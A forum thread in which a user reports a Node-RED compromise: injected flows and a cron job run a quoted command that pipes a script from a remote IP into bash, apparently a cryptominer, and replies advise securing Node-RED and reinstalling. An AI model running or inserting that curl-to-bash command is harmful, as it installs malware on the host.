Have I got a virus in Node-red?

Hi,

I get a lot of new tabs, with 3 things in them.
Timestamp, exec and msg.payload
All new tabs look the same. The exec node has this in it:
"curl -s http://192.99.142.226:8220/mr.sh | bash -sh"

Which seems to be cryptomining crap... (I found out after some googling).

It also goes in my cron (running on a ubuntu-server computer).

How do I delete this?
I have tried to clean node red, plus the cron. But after a day it's all back there....
Any ideas?

Short answer: yes

Others have been affected by it this weekend: Missing and mysterious new flows

It comes as a result of you exposing node-red on the internet with no security applied.

Without doing a careful examination of what that script does, the only safe way to be sure is to reinstall the server. And make sure you secure node-red properly before considering exposing it on the internet. If you removed it without securing node-red, there's nothing stopping them from redeploying their flow.

If I get time, I'll report this to UK CiSP. I'll also see if I can track down the owner of that IP address and see if we can kill it off.

@knolleary, you might want to let the IBM security guys know since Node-RED still has associations with IBM.

Really, it needs someone to kill off that script.

That link tells you what you missed... There is more to it than just clearing node-red and the cron job.

Thanks!
Have deleted those files as well now!

That’s assuming you have identified all the software that has been downloaded.

To be absolutely safe you would need to reformat the hard disk and start again